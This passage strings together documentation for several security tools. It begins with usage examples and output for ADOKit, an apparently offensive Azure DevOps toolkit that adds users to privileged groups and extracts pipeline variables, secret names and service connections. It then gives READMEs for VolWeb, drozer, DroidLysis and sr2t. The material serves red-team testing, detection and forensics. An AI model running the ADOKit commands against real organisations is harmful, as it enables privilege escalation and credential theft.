[*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
---------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 12:21:42 Finished execution of addcollectionbuildadmin
Remove a user from the Project Collection Build Administrators group.
Provide the removecollectionbuildadmin
module along with a /user:
for a given user to be removed from the Project Collection Build Administrators
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:21:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
--------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------
4/5/23 12:22:02 Finished execution of removecollectionbuildadmin
Add a user to the Project Collection Build Service Accounts group.
Provide the addcollectionbuildsvc
module along with a /user:
for a given user to be added to the Project Collection Build Service Accounts
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:22:13 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------ --------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 12:22:15 Finished execution of addcollectionbuildsvc
Remove a user from the Project Collection Build Service Accounts group.
Provide the removecollectionbuildsvc
module along with a /user:
for a given user to be removed from the Project Collection Build Service Accounts
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:22:27 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------
4/5/23 12:22:28 Finished execution of removecollectionbuildsvc
Add a user to the Project Collection Service Accounts group.
Provide the addcollectionsvc
module along with a /user:
for a given user to be added to the Project Collection Service Accounts
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 11:21:01 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 15:21:04 Finished execution of addcollectionsvc
Remove a user from the Project Collection Service Accounts group.
Provide the removecollectionsvc
module along with a /user:
for a given user to be removed from the Project Collection Service Accounts
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 11:21:43 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/5/23 15:21:44 Finished execution of removecollectionsvc
Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.
Provide the getpipelinevars
module along with a /project:
for a given project to extract any pipeline variables being used. If you would like to extract pipeline variables from all projects specify all
in the /project:
argument.
ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpipelinevars
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/6/2023 12:08:35 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Pipeline Var Name | Pipeline Var Value
-----------------------------------------------------------------------------------
credential | P@ssw0rd123!
url | http://blah/
4/6/23 16:08:36 Finished execution of getpipelinevars
Extract the names of any pipeline secrets being used in project(s), which will direct the operator where to attempt to perform secret extraction.
Provide the getpipelinesecrets
module along with a /project:
for a given project to extract the names of any pipeline secrets being used. If you would like to extract the names of pipeline secrets from all projects specify all
in the /project:
argument.
ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpipelinesecrets
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/10/2023 10:28:37 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Build Secret Name | Build Secret Value
-----------------------------------------------------
anotherSecretPass | [HIDDEN]
secretpass | [HIDDEN]
4/10/23 14:28:38 Finished execution of getpipelinesecrets
List any service connections being used in project(s), which will direct the operator where to attempt to perform credential extraction for any service connections being used.
Provide the getserviceconnections
module along with a /project:
for a given project to list any service connections being used. If you would like to list service connections being used from all projects specify all
in the /project:
argument.
ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getserviceconnections
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/11/2023 8:34:16 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Connection Name | Connection Type | ID
--------------------------------------------------------------------------------------------------------------------------------------------------
Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382
4/11/23 12:34:16 Finished execution of getserviceconnections
Below are static signatures for the specific usage of this tool in its default state:
{60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
ADOKit-21e233d4334f9703d1a3a42b6e2efd38
ADOKitUsage.json
- Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)PersistenceTechniqueWithADOKit.json
- Detects the creation of a PAT or SSH key with ADOKitFor detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.
https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops
VolWeb is a digital forensic memory analysis platform that leverages the power of the Volatility 3 framework. It is dedicated to aiding in investigations and incident responses.
The goal of VolWeb is to enhance the efficiency of memory collection and forensic analysis by providing a centralized, visual, and enhanced web application for incident responders and digital forensics investigators. Once an investigator obtains a memory image from a Linux or Windows system, the evidence can be uploaded to VolWeb, which triggers automatic processing and extraction of artifacts using the power of the Volatility 3 framework.
By utilizing cloud-native storage technologies, VolWeb also enables incident responders to directly upload memory images into the VolWeb platform from various locations using dedicated scripts interfaced with the platform and maintained by the community. Another goal is to allow users to compile technical information, such as Indicators, which can later be imported into modern CTI platforms like OpenCTI, thereby connecting your incident response and CTI teams after your investigation.
The project documentation is available on the Wiki. There, you will be able to deploy the tool in your investigation environment or lab.
[!IMPORTANT] Take time to read the documentation in order to avoid common miss-configuration issues.
VolWeb exposes a REST API to allow analysts to interact with the platform. There is a dedicated repository proposing some scripts maintained by the community: https://github.com/forensicxlab/VolWeb-Scripts Check the wiki of the project to learn more about the possible API calls.
If you have encountered a bug, or wish to propose a feature, please feel free to open an issue. To enable us to quickly address them, follow the guide in the "Contributing" section of the Wiki associated with the project.
Contact me at k1nd0ne@mail.com for any questions regarding this tool.
Check out the roadmap: https://github.com/k1nd0ne/VolWeb/projects/1
drozer (formerly Mercury) is the leading security testing framework for Android.
drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.
drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (WithSecure's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).
drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used with little to no programming experience required to show the impact of letting certain components be exported on a device.
drozer is open source software, maintained by WithSecure, and can be downloaded from: https://labs.withsecure.com/tools/drozer/
To help with making sure drozer can be run on modern systems, a Docker container was created that has a working build of Drozer. This is currently the recommended method of using Drozer on modern systems.
Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.
Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
python setup.py bdist_wheel
sudo pip install dist/drozer-2.x.x-py2-none-any.whl
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
make deb
sudo dpkg -i drozer-2.x.x.deb
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
make rpm
sudo rpm -I drozer-2.x.x-1.noarch.rpm
NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
python.exe setup.py bdist_msi
Run dist/drozer-2.x.x.win-x.msi
Drozer can be installed using Android Debug Bridge (adb).
Download the latest Drozer Agent here.
$ adb install drozer-agent-2.x.x.apk
You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring.
We will use the server embedded in the drozer Agent to do this.
If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:
$ adb forward tcp:31415 tcp:31415
Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.
Then, on your PC, connect using the drozer Console:
On Linux:
$ drozer console connect
On Windows:
> drozer.bat console connect
If using a real device, the IP address of the device on the network must be specified:
On Linux:
$ drozer console connect --server 192.168.0.10
On Windows:
> drozer.bat console connect --server 192.168.0.10
You should be presented with a drozer command prompt:
selecting f75640f67144d9a3 (unknown sdk 4.1.1)
dz>
The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.
You are now ready to start exploring the device.
Command | Description |
---|---|
run | Executes a drozer module |
list | Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run. |
shell | Start an interactive Linux shell on the device, in the context of the Agent process. |
cd | Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module. |
clean | Remove temporary files stored by drozer on the Android device. |
contributors | Displays a list of people who have contributed to the drozer framework and modules in use on your system. |
echo | Print text to the console. |
exit | Terminate the drozer session. |
help | Display help about a particular command or module. |
load | Load a file containing drozer commands, and execute them in sequence. |
module | Find and install additional drozer modules from the Internet. |
permissions | Display a list of the permissions granted to the drozer Agent. |
set | Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer. |
unset | Remove a named variable that drozer passes to any Linux shells that it spawns. |
drozer is released under a 3-clause BSD License. See LICENSE for full details.
drozer is Open Source software, made great by contributions from the community.
Bug reports, feature requests, comments and questions can be submitted here.
DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.
DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.
sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev
Install Android disassembly tools
Apktool ,
$ mkdir -p ~/softs
$ cd ~/softs
$ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
$ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
$ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
$ unzip dex-tools-v2.4.zip
$ rm -f dex-tools-v2.4.zip
Install from Git in a Python virtual environment (python3 -m venv
, or pyenv virtual environments etc).
$ python3 -m venv venv
$ source ./venv/bin/activate
(venv) $ pip3 install git+https://github.com/cryptax/droidlysis
Alternatively, you can install DroidLysis directly from PyPi (pip3 install droidlysis
).
conf/general.conf
. In particular make sure to change /home/axelle
with your appropriate directories.[tools]
apktool = /home/axelle/softs/apktool_2.9.3.jar
baksmali = /home/axelle/softs/baksmali-2.5.2.jar
dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
keytool = /usr/bin/keytool
...
python3 ./droidlysis3.py --help
The configuration file is ./conf/general.conf
(you can switch to another file with the --config
option). This is where you configure the location of various external tools (e.g. Apktool), the name of pattern files (by default ./conf/smali.conf
, ./conf/wide.conf
, ./conf/arm.conf
, ./conf/kit.conf
) and the name of the database file (only used if you specify --enable-sql
)
Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.
DroidLysis uses Python 3. To launch it and get options:
droidlysis --help
For example, test it on Signal's APK:
droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf
DroidLysis outputs:
--output /tmp
, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290
.droidlysis.db
) containing properties it noticed.Get usage with droidlysis --help
The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other type of files (unless there is a bug...) but won't be able to understand the content.
When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein
. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput
. If you want to store all statistics in a SQL database, use --enable-sql
(see here)
DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon
.
DroidLysis's analysis does not inspect known 3rd party SDK by default, i.e. for instance it won't report any suspicious activity from these. If you want them to be inspected, use option --no-kit-exception
. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisment) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).
--output DIR
)This directory contains (when applicable):
AndroidManifest.xml
res
lib
, assets assets
smali
(and others)META-INF
./unzipped
classes.dex
(and others), and converted to jar: classes-dex2jar.jar
, and unjarred in ./unjarred
The following files are generated by DroidLysis:
autoanalysis.md
: lists each pattern DroidLysis detected and where.report.md
: same as what was printed on the consoleIf you do not need the sample output directory to be generated, use the option --clearoutput
.
--import-exodus
)$ python3 ./droidlysis3.py --import-exodus --verbose
Processing file: ./droidurl.pyc ...
DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf
Trackers from Exodus which are not present in your initial kit.conf
are appended to ~/.cache/droidlysis/kit.conf
. Diff the 2 files and check what trackers you wish to add.
If you want to process a directory of samples, you'll probably like to store the properties DroidLysis found in a database, to easily parse and query the findings. In that case, use the option --enable-sql
. This will automatically dump all results in a database named droidlysis.db
, in a table named samples
. Each entry in the table is relative to a given sample. Each column is properties DroidLysis tracks.
For example, to retrieve all filename, SHA256 sum and smali properties of the database:
sqlite> select sha256, sanitized_basename, smali_properties from samples;
f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
...
What DroidLysis detects can be configured and extended in the files of the ./conf
directory.
A pattern consist of:
send_sms
. This is to name the property. Must be unique across the .conf
file.;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
. In the smali.conf
file, this regexp is match on Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.[send_sms]
pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
description=Sending SMS messages
Exodus Privacy maintains a list of various SDKs which are interesting to rule out in our analysis via conf/kit.conf
. Add option --import_exodus
to the droidlysis command line: this will parse existing trackers Exodus Privacy knows and which aren't yet in your kit.conf
. Finally, it will append all new trackers to ~/.cache/droidlysis/kit.conf
.
Afterwards, you may want to sort your kit.conf
file:
import configparser
import collections
import os
config = configparser.ConfigParser({}, collections.OrderedDict)
config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
# Order all sections alphabetically
config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0] ))
with open('sorted.conf','w') as f:
config.write(f)
This tool takes a scanning tool's output file, and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:
This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all scanning reports.
Using Pip:
pip install --user sr2t
You can use sr2t
in two ways:
sr2t --help
.python -m src.sr2t --help
$ sr2t --help
usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]
[--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]
[--testssl TESTSSL [TESTSSL ...]]
[--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]
[--nmap-services] [--no-nessus-autoclassify]
[--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]
[--nessus-tls-file NESSUS_TLS_FILE]
[--nessus-x509-file NESSUS_X509_FILE]
[--nessus-http-file NESSUS_HTTP_FILE]
[--nessus-smb-file NESSUS_SMB_FILE]
[--nessus-rdp-file NESSUS_RDP_FILE]
[--nessus-ssh-file NESSUS_SSH_FILE]
[--nessus-min-severity NESSUS_MIN_SEVERITY]
[--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]
[--nessus-sort-by NESSUS_SORT_BY]
[--nikto-description-width NIKTO_DESCRIPTION_WIDTH]< br/> [--fortify-details] [--annotation-width ANNOTATION_WIDTH]
[-oC OUTPUT_CSV] [-oT OUTPUT_TXT] [-oX OUTPUT_XLSX]
[-oA OUTPUT_ALL]
Converting scanning reports to a tabular format
optional arguments:
-h, --help show this help message and exit
--nmap-state NMAP_STATE
Specify the desired state to filter (e.g.
open|filtered).
--nmap-services Specify to ouput a supplemental list of detected
services.
--no-nessus-autoclassify
Specify to not autoclassify Nessus results.
--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE
Specify to override a custom Nessus autoclassify YAML
file.
--nessus-tls-file NESSUS_TLS_FILE
Specify to override a custom Nessus TLS findings YAML
file.
--nessus-x509-file NESSUS_X509_FILE
Specify to override a custom Nessus X.509 findings
YAML file.
--nessus-http-file NESSUS_HTTP_FILE
Specify to override a custom Nessus HTTP findings YAML
file.
--nessus-smb-file NESSUS_SMB_FILE
Specify to override a custom Nessus SMB findings YAML
file.
--nessus-rdp-file NESSUS_RDP_FILE
Specify to override a custom Nessus RDP findings YAML
file.
--nessus-ssh-file NESSUS_SSH_FILE
Specify to override a custom Nessus SSH findings YAML
file.
--nessus-min-severity NESSUS_MIN_SEVERITY
Specify the minimum severity to output (e.g. 1).
--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH
Specify the width of the pluginid column (e.g. 30).
--nessus-sort-by NESSUS_SORT_BY
Specify to sort output by ip-address, port, plugin-id,
plugin-name or severity.
--nikto-description-width NIKTO_DESCRIPTION_WIDTH
Specify the width of the description column (e.g. 30).
--fortify-details Specify to include the Fortify abstracts, explanations
and recommendations for each vulnerability.
--annotation-width ANNOTATION_WIDTH
Specify the width of the annotation column (e.g. 30).
-oC OUTPUT_CSV, --output-csv OUTPUT_CSV
Specify the output CSV basename (e.g. output).
-oT OUTPUT_TXT, --output-txt OUTPUT_TXT
Specify the output TXT file (e.g. output.txt).
-oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX
Specify the outpu t XLSX file (e.g. output.xlsx). Only
for Nessus at the moment
-oA OUTPUT_ALL, --output-all OUTPUT_ALL
Specify the output basename to output to all formats
(e.g. output).
specify at least one:
--nessus NESSUS [NESSUS ...]
Specify (multiple) Nessus XML files.
--nmap NMAP [NMAP ...]
Specify (multiple) Nmap XML files.
--nikto NIKTO [NIKTO ...]
Specify (multiple) Nikto XML files.
--dirble DIRBLE [DIRBLE ...]
Specify (multiple) Dirble XML files.
--testssl TESTSSL [TESTSSL ...]
Specify (multiple) Testssl JSON files.
--fortify FORTIFY [FORTIFY ...]
Specify (multiple) HP Fortify FPR files.
A few examples
To produce an XLSX format:
$ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --nessus example/nessus.nessus
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| host | port | plugin id | plugin name | severity | annotations |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| 192.168.142.4 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.4 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.4 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.4 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.4 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.4 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.4 | 3389 | 51192 | SSL Certificate Can not Be Trusted | 2 | X |
| 192.168.142.2 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.2 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.2 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.2 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.2 | 3389 | 45411 | S SL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.2 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.2 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
| 192.168.142.2 | 445 | 57608 | SMB Signing not required | 2 | X |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
Or to output a CSV file:
$ sr2t --nessus example/nessus.nessus -oC example
$ cat example_nessus.csv
host,port,plugin id,plugin name,severity,annotations
192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
